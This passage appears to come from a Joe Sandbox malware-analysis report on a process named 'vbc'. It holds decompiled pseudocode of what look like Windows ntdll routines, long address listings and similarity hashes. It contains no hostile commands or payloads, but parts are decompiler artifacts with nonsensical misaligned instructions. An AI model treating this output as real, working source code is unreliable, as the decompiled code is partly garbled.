								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t281 = _v56;
								if(_v56 != 0) {
									_t315 =  &_v36;
									_t283 = E015E2E3E(_t281,  &_v36);
									_t295 = _v36;
									_v76 = _t283;
								}
								if(_t295 == 0) {
									goto L44;
								} else {
									_t285 = _t285 + 2 + _t295;
								}
								goto L14;
							case 6:
								__eax =  *0x16a5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x16a8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x16a8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x16a6e58 & 0x0000ffff;
								__eax = ( *0x16a6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t315 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					_t337 = 0x25;
					 *((intOrPtr*)(_t337 + 0x28)) =  *((intOrPtr*)(_t337 + 0x28)) + _t353;
					_t247 = _t246 + _t353;
					asm("daa");
					_pop(_t339);
					 *_t339 =  *_t339 + _t349;
					_pop(_t340);
					 *((intOrPtr*)(_t340 + 0x28)) =  *((intOrPtr*)(_t340 + 0x28)) + _t247;
					_pop(_t341);
					 *0x1f015e26 =  *0x1f015e26 + _t247;
					_pop(_t290);
					asm("bound eax, [ecx]");
					_t355 = _t247;
					 *((intOrPtr*)(_t341 + 1)) =  *((intOrPtr*)(_t341 + 1)) - _t290;
					 *((intOrPtr*)(_t341 + 1)) =  *((intOrPtr*)(_t341 + 1)) - _t290;
					 *(_t353 ^ 0x0201625b) =  *(_t353 ^ 0x0201625b) - 0x5e;
					asm("daa");
					_pop(_t343);
					 *_t343 =  *_t343 + _t290;
					 *((intOrPtr*)(_t343 + 1)) =  *((intOrPtr*)(_t343 + 1)) - _t290;
					 *((intOrPtr*)(_t343 - 1 + 1)) =  *((intOrPtr*)(_t343 - 1 + 1)) - _t290;
					asm("daa");
					_pop(_t291);
					asm("bound eax, [ecx]");
					_pop(_t346);
					 *((intOrPtr*)(_t355 + _t291 * 2)) =  *((intOrPtr*)(_t355 + _t291 * 2)) + _t346;
					asm("bound eax, [ecx]");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x168ff00);
					E0160D08C(_t291, _t328, _t346);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t292 = _a12;
					__eflags = _t292;
					if(_t292 == 0) {
						_t254 = 0xc0000100;
					} else {
						_v8 = 0;
						_t347 = 0xc0000100;
						_v52 = 0xc0000100;
						_t256 = 4;
						while(1) {
							_v40 = _t256;
							__eflags = _t256;
							if(_t256 == 0) {
								break;
							}
							_t305 = _t256 * 0xc;
							_v48 = _t305;
							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0x1591664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t271 = E015FE5C0(_a8,  *((intOrPtr*)(_t305 + 0x1591668)), _t292);
									_t355 = _t355 + 0xc;
									__eflags = _t271;
									if(__eflags == 0) {
										_t347 = E016351BE(_t292,  *((intOrPtr*)(_v48 + 0x159166c)), _a16, _t329, _t347, __eflags, _a20, _a24);
										_v52 = _t347;
										break;
									} else {
										_t256 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t256 = _t256 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t347;
						__eflags = _t347;
						if(_t347 < 0) {
							__eflags = _t347 - 0xc0000100;
							if(_t347 == 0xc0000100) {
								_t301 = _a4;
								__eflags = _t301;
								if(_t301 != 0) {
									_v36 = _t301;
									__eflags =  *_t301 - _t329;
									if( *_t301 == _t329) {
										_t347 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t258 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t258 + 0x48)) - _t301;
										if( *((intOrPtr*)(_t258 + 0x48)) == _t301) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t347 = E015E2AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
												_v32 = _t347;
												__eflags = _t347 - 0xc0000100;
												if(_t347 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t301 = _v36;
													goto L75;
												}
											} else {
												_t261 = E015C6600( *(_t317 + 0x1c));
												__eflags = _t261;
												if(_t261 != 0) {
													goto L106;
												} else {
													_t301 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t347 = E015E2C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t347;
											goto L69;
										}
									}
									goto L108;
								} else {
									E015CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t347 = _a24;
									_t268 = E015E2AE4( &_v36, _a8, _t292, _a16, _a20, _t347);
									_v32 = _t268;
									__eflags = _t268 - 0xc0000100;
									if(_t268 == 0xc0000100) {
										_v32 = E015E2C50(_v36, _a8, _t292, _a16, _a20, _t347, 1);
									}
									_v8 = _t329;
									E015E2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t254 = _t347;
					}
					L70:
					return E0160D0D1(_t254);
				}
				L108:
			}



























































                                                  0x015e2584
                                                  0x015e2586
                                                  0x015e2590
                                                  0x015e2596
                                                  0x015e2597
                                                  0x015e2598
                                                  0x015e259e
                                                  0x015e25a4
                                                  0x015e25a9
                                                  0x015e25ac
                                                  0x015e25ae
                                                  0x015e25b1
                                                  0x015e25b2
                                                  0x015e25b5
                                                  0x015e25b8
                                                  0x015e25bb
                                                  0x015e25bc
                                                  0x015e25bf
                                                  0x015e25c2
                                                  0x015e25c5
                                                  0x015e25c6
                                                  0x015e25cb
                                                  0x015e25ce
                                                  0x015e25d8
                                                  0x015e25db
                                                  0x015e25dd
                                                  0x015e25de
                                                  0x015e25e1
                                                  0x015e25e3
                                                  0x015e25e9
                                                  0x015e26da
                                                  0x015e26da
                                                  0x015e26dd
                                                  0x015e26e2
                                                  0x01625b56
                                                  0x00000000
                                                  0x015e26e8
                                                  0x015e26f9
                                                  0x015e26fb
                                                  0x015e26fe
                                                  0x015e2700
                                                  0x01625b60
                                                  0x00000000
                                                  0x015e2706
                                                  0x015e2706
                                                  0x015e270a
                                                  0x015e270a
                                                  0x015e270d
                                                  0x015e2713
                                                  0x015e2716
                                                  0x015e2718
                                                  0x015e271c
                                                  0x015e271e
                                                  0x01625b6c
                                                  0x01625b6f
                                                  0x01625b7f
                                                  0x01625b89
                                                  0x01625b8e
                                                  0x01625b93
                                                  0x01625b96
                                                  0x01625b9c
                                                  0x01625ba0
                                                  0x01625ba3
                                                  0x01625bab
                                                  0x01625bb0
                                                  0x01625bb3
                                                  0x01625bb3
                                                  0x01625ba3
                                                  0x015e2724
                                                  0x015e2726
                                                  0x015e2729
                                                  0x015e272c
                                                  0x015e279d
                                                  0x015e279d
                                                  0x015e27a0
                                                  0x015e27a2
                                                  0x00000000
                                                  0x015e272e
                                                  0x015e272e
                                                  0x015e2731
                                                  0x015e2734
                                                  0x015e2734
                                                  0x015e2736
                                                  0x01625bc1
                                                  0x01625bc1
                                                  0x01625bc4
                                                  0x00000000
                                                  0x01625bca
                                                  0x01625bca
                                                  0x01625bcd
                                                  0x00000000
                                                  0x01625bd3
                                                  0x00000000
                                                  0x01625bd3
                                                  0x01625bcd
                                                  0x015e273c
                                                  0x015e273c
                                                  0x015e2742
                                                  0x015e2747
                                                  0x015e274a
                                                  0x015e274d
                                                  0x015e2750
                                                  0x00000000
                                                  0x015e2756
                                                  0x015e2756
                                                  0x00000000
                                                  0x015e2902
                                                  0x015e2908
                                                  0x015e290b
                                                  0x00000000
                                                  0x015e2911
                                                  0x015e291c
                                                  0x015e2921
                                                  0x00000000
                                                  0x015e2921
                                                  0x00000000
                                                  0x00000000
                                                  0x015e2880
                                                  0x015e2887
                                                  0x015e288c
                                                  0x00000000
                                                  0x00000000
                                                  0x015e2805
                                                  0x015e280a
                                                  0x015e2814
                                                  0x015e2816
                                                  0x00000000
                                                  0x00000000
                                                  0x015e281e
                                                  0x015e2821
                                                  0x015e2823
                                                  0x00000000
                                                  0x015e2829
                                                  0x015e2829
                                                  0x015e2831
                                                  0x015e283c
                                                  0x015e283e
                                                  0x00000000
                                                  0x015e283e
                                                  0x00000000
                                                  0x00000000
                                                  0x015e284e
                                                  0x015e2850
                                                  0x015e2851
                                                  0x015e2854
                                                  0x015e2857
                                                  0x015e285a
                                                  0x015e285c
                                                  0x015e285d
                                                  0x00000000
                                                  0x00000000
                                                  0x015e275d
                                                  0x015e2761
                                                  0x00000000
                                                  0x015e2767
                                                  0x015e276e
                                                  0x015e2773
                                                  0x015e2773
                                                  0x015e2776
                                                  0x015e2778
                                                  0x015e277e
                                                  0x015e277e
                                                  0x015e2781
                                                  0x015e2781
                                                  0x015e2783
                                                  0x015e2784
                                                  0x00000000
                                                  0x00000000
                                                  0x01625bd8
                                                  0x01625bde
                                                  0x01625be4
                                                  0x01625be6
                                                  0x01625be8
                                                  0x01625be9
                                                  0x01625bee
                                                  0x01625bf8
                                                  0x01625bff
                                                  0x01625c01
                                                  0x01625c04
                                                  0x01625c07
                                                  0x01625c0b
                                                  0x01625c0d
                                                  0x01625c0d
                                                  0x01625c15
                                                  0x01625c18
                                                  0x01625c1b
                                                  0x01625c1b
                                                  0x01625c1e
                                                  0x00000000
                                                  0x00000000
                                                  0x015e28c3
                                                  0x015e28c8
                                                  0x015e28d2
                                                  0x015e28d4
                                                  0x015e28d8
                                                  0x015e28db
                                                  0x01625c26
                                                  0x01625c28
                                                  0x01625c2d
                                                  0x01625c2d
                                                  0x00000000
                                                  0x00000000
                                                  0x01625c34
                                                  0x01625c36
                                                  0x01625c49
                                                  0x01625c4e
                                                  0x01625c54
                                                  0x01625c5b
                                                  0x01625c5d
                                                  0x01625c60
                                                  0x015e2788
                                                  0x015e2788
                                                  0x015e278b
                                                  0x015e278e
                                                  0x015e278e
                                                  0x015e278e
                                                  0x015e2791
                                                  0x00000000
                                                  0x00000000
                                                  0x015e2756
                                                  0x015e2750
                                                  0x00000000
                                                  0x015e2794
                                                  0x015e2794
                                                  0x015e2795
                                                  0x015e2798
                                                  0x015e2798
                                                  0x00000000
                                                  0x015e2734
                                                  0x015e272c
                                                  0x015e2700
                                                  0x015e25ef
                                                  0x015e25ef
                                                  0x015e25ef
                                                  0x015e25f2
                                                  0x015e25f8
                                                  0x00000000
                                                  0x00000000
                                                  0x015e25fe
                                                  0x00000000
                                                  0x015e28e6
                                                  0x015e28ec
                                                  0x015e28ef
                                                  0x015e28f5
                                                  0x015e28f8
                                                  0x015e28f8
                                                  0x00000000
                                                  0x015e28f8
                                                  0x00000000
                                                  0x00000000
                                                  0x015e2866
                                                  0x015e2866
                                                  0x015e2876
                                                  0x015e2879
                                                  0x00000000
                                                  0x00000000
                                                  0x015e27e0
                                                  0x015e27e7
                                                  0x015e27e9
                                                  0x015e27eb
                                                  0x01625afd
                                                  0x00000000
                                                  0x01625afd
                                                  0x00000000
                                                  0x00000000
                                                  0x015e2633
                                                  0x015e2638
                                                  0x015e263b
                                                  0x015e263c
                                                  0x015e263e
                                                  0x015e2640
                                                  0x015e2642
                                                  0x015e2647
                                                  0x015e2649
                                                  0x015e264e
                                                  0x015e2650
                                                  0x015e2653
                                                  0x015e2659
                                                  0x015e26a2
                                                  0x015e26a7
                                                  0x015e26ac
                                                  0x015e26b2
                                                  0x01625b11
                                                  0x01625b15
                                                  0x01625b17
                                                  0x00000000
                                                  0x015e26b8
                                                  0x015e26b8
                                                  0x015e26ba
                                                  0x015e27a6
                                                  0x015e27a6
                                                  0x015e27a9
                                                  0x015e27ab
                                                  0x015e27b9
                                                  0x015e27b9
                                                  0x015e27be
                                                  0x015e27c1
                                                  0x015e27c3
                                                  0x015e27c5
                                                  0x015e27c7
                                                  0x01625c74
                                                  0x01625c79
                                                  0x01625c79
                                                  0x015e27c7
                                                  0x00000000
                                                  0x015e26c0
                                                  0x015e26c0
                                                  0x015e26c3
                                                  0x015e26c6
                                                  0x015e26c6
                                                  0x015e26c9
                                                  0x015e26c9
                                                  0x00000000
                                                  0x015e26c9
                                                  0x015e26ba
                                                  0x015e265b
                                                  0x015e265b
                                                  0x015e265e
                                                  0x015e2667
                                                  0x015e266d
                                                  0x015e2677
                                                  0x015e267c
                                                  0x015e267f
                                                  0x015e2681
                                                  0x01625b49
                                                  0x01625b4e
                                                  0x015e27cd
                                                  0x015e27d0
                                                  0x015e27d1
                                                  0x015e27d2
                                                  0x015e27d4
                                                  0x015e27dd
                                                  0x015e2687
                                                  0x015e2687
                                                  0x015e268a
                                                  0x015e268b
                                                  0x015e268e
                                                  0x015e268f
                                                  0x015e2691
                                                  0x015e2696
                                                  0x015e2698
                                                  0x015e269d
                                                  0x015e269f
                                                  0x00000000
                                                  0x015e269f
                                                  0x015e2681
                                                  0x00000000
                                                  0x00000000
                                                  0x015e2846
                                                  0x00000000
                                                  0x00000000
                                                  0x015e2605
                                                  0x015e260a
                                                  0x015e260c
                                                  0x015e2611
                                                  0x015e2616
                                                  0x015e2619
                                                  0x015e2619
                                                  0x015e261e
                                                  0x00000000
                                                  0x015e2624
                                                  0x015e2627
                                                  0x015e2627
                                                  0x00000000
                                                  0x00000000
                                                  0x01625b1f
                                                  0x00000000
                                                  0x00000000
                                                  0x015e2894
                                                  0x015e289b
                                                  0x015e289d
                                                  0x015e28a1
                                                  0x01625b2b
                                                  0x01625b2e
                                                  0x01625b2e
                                                  0x015e28a7
                                                  0x015e28a9
                                                  0x01625b04
                                                  0x01625b09
                                                  0x01625b09
                                                  0x01625b09
                                                  0x00000000
                                                  0x00000000
                                                  0x01625b35
                                                  0x01625b3c
                                                  0x015e28fb
                                                  0x015e28fb
                                                  0x015e26cc
                                                  0x015e26cc
                                                  0x015e26d0
                                                  0x00000000
                                                  0x015e26d2
                                                  0x015e26d2
                                                  0x00000000
                                                  0x015e26d2
                                                  0x00000000
                                                  0x00000000
                                                  0x015e25fe
                                                  0x015e292d
                                                  0x015e2930
                                                  0x015e2935
                                                  0x015e2937
                                                  0x015e2938
                                                  0x015e293c
                                                  0x015e293e
                                                  0x015e293f
                                                  0x015e2940
                                                  0x015e2942
                                                  0x015e2944
                                                  0x015e2947
                                                  0x015e2948
                                                  0x015e294e
                                                  0x015e294f
                                                  0x015e2951
                                                  0x015e2952
                                                  0x015e295a
                                                  0x015e295d
                                                  0x015e2962
                                                  0x015e2963
                                                  0x015e2964
                                                  0x015e2966
                                                  0x015e296a
                                                  0x015e296e
                                                  0x015e2972
                                                  0x015e2973
                                                  0x015e2977
                                                  0x015e2978
                                                  0x015e297b
                                                  0x015e297d
                                                  0x015e297e
                                                  0x015e297f
                                                  0x015e2980
                                                  0x015e2981
                                                  0x015e2982
                                                  0x015e2983
                                                  0x015e2984
                                                  0x015e2985
                                                  0x015e2986
                                                  0x015e2987
                                                  0x015e2988
                                                  0x015e2989
                                                  0x015e298a
                                                  0x015e298b
                                                  0x015e298c
                                                  0x015e298d
                                                  0x015e298e
                                                  0x015e298f
                                                  0x015e2990
                                                  0x015e2992
                                                  0x015e2997
                                                  0x015e29a3
                                                  0x015e29a6
                                                  0x015e29ab
                                                  0x015e29ad
                                                  0x015e29b0
                                                  0x015e29b2
                                                  0x01625c80
                                                  0x015e29b8
                                                  0x015e29b8
                                                  0x015e29bb
                                                  0x015e29c0
                                                  0x015e29c5
                                                  0x015e29c6
                                                  0x015e29c6
                                                  0x015e29c9
                                                  0x015e29cb
                                                  0x00000000
                                                  0x00000000
                                                  0x015e29cd
                                                  0x015e29d0
                                                  0x015e29d9
                                                  0x015e29db
                                                  0x015e29dd
                                                  0x015e2a7f
                                                  0x015e2a84
                                                  0x015e2a87
                                                  0x015e2a89
                                                  0x01625ca1
                                                  0x01625ca3
                                                  0x00000000
                                                  0x015e2a8f
                                                  0x015e2a8f
                                                  0x00000000
                                                  0x015e2a8f
                                                  0x00000000
                                                  0x015e29e3
                                                  0x015e29e3
                                                  0x015e29e3
                                                  0x00000000
                                                  0x015e29e3
                                                  0x015e29dd
                                                  0x00000000
                                                  0x015e29db
                                                  0x015e29e6
                                                  0x015e29e9
                                                  0x015e29eb
                                                  0x015e29ed
                                                  0x015e29f3
                                                  0x015e29f5
                                                  0x015e29f8
                                                  0x015e29fa
                                                  0x015e2a97
                                                  0x015e2a9a
                                                  0x015e2a9d
                                                  0x015e2add
                                                  0x00000000
                                                  0x015e2a9f
                                                  0x015e2aa2
                                                  0x015e2aa5
                                                  0x015e2aa8
                                                  0x015e2aab
                                                  0x01625cab
                                                  0x01625caf
                                                  0x01625cc5
                                                  0x01625cda
                                                  0x01625cdc
                                                  0x01625cdf
                                                  0x01625ce5
                                                  0x00000000
                                                  0x01625ceb
                                                  0x01625ced
                                                  0x01625cee
                                                  0x00000000
                                                  0x01625cee
                                                  0x01625cb1
                                                  0x01625cb4
                                                  0x01625cb9
                                                  0x01625cbb
                                                  0x00000000
                                                  0x01625cbd
                                                  0x01625cbd
                                                  0x00000000
                                                  0x01625cbd
                                                  0x01625cbb
                                                  0x015e2ab1
                                                  0x015e2ab1
                                                  0x015e2ac4
                                                  0x015e2ac6
                                                  0x015e2ac6
                                                  0x00000000
                                                  0x015e2ac6
                                                  0x015e2aab
                                                  0x00000000
                                                  0x015e2a00
                                                  0x015e2a09
                                                  0x015e2a0e
                                                  0x015e2a21
                                                  0x015e2a24
                                                  0x015e2a35
                                                  0x015e2a3a
                                                  0x015e2a3d
                                                  0x015e2a42
                                                  0x015e2a59
                                                  0x015e2a59
                                                  0x015e2a5c
                                                  0x015e2a5f
                                                  0x015e2a5f
                                                  0x015e29fa
                                                  0x015e29f3
                                                  0x015e2a64
                                                  0x015e2a64
                                                  0x015e2a6b
                                                  0x015e2a6b
                                                  0x015e2a6d
                                                  0x015e2a72
                                                  0x015e2a72
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PATH
                                                  • API String ID: 0-1036084923
                                                  • Opcode ID: 7ec8648ee7d80cf171860dc0cb10193b20faf472a6dc8416b222bd5b7eb2094a
                                                  • Instruction ID: 64bfd0850c325be6ea5ad37ba79ec984a9d3b6202494370b39902ff522262882
                                                  • Opcode Fuzzy Hash: 7ec8648ee7d80cf171860dc0cb10193b20faf472a6dc8416b222bd5b7eb2094a
                                                  • Instruction Fuzzy Hash: 03C19EB1D4021ADBDB29DF98DC85AAEBBF9FF48740F484029E901AF254D734A841CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015EFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E015EFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E015CEEF0(0x16a7b60);
					_t134 =  *0x16a7b84; // 0x773a7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x16a7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x16a7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E015C6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E015C76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01658938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E015BB150();
													}
													_t116 = E01656D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E015C75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x16a8638; // 0x0
																	_t122 = L015C38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E015C76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E015C76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L015EFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L015C70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E015EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E015EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E015EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E015EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E015EFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x16a7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x16a7b84 = _t75;
						_t73 = E015CEB70(_t134, 0x16a7b60);
						if( *0x16a7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E015CFF60( *0x16a7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                  0x015efab0
                                                  0x015efab2
                                                  0x015efab3
                                                  0x015efab4
                                                  0x015efabc
                                                  0x015efac0
                                                  0x015efb14
                                                  0x015efb17
                                                  0x015efac2
                                                  0x015efac8
                                                  0x015efacd
                                                  0x015efad3
                                                  0x015efad3
                                                  0x015efadd
                                                  0x015efb18
                                                  0x015efb1b
                                                  0x015efb1d
                                                  0x015efb1e
                                                  0x015efb1f
                                                  0x015efb20
                                                  0x015efb21
                                                  0x015efb22
                                                  0x015efb23
                                                  0x015efb24
                                                  0x015efb25
                                                  0x015efb26
                                                  0x015efb27
                                                  0x015efb28
                                                  0x015efb29
                                                  0x015efb2a
                                                  0x015efb2b
                                                  0x015efb2c
                                                  0x015efb2d
                                                  0x015efb2e
                                                  0x015efb2f
                                                  0x015efb3a
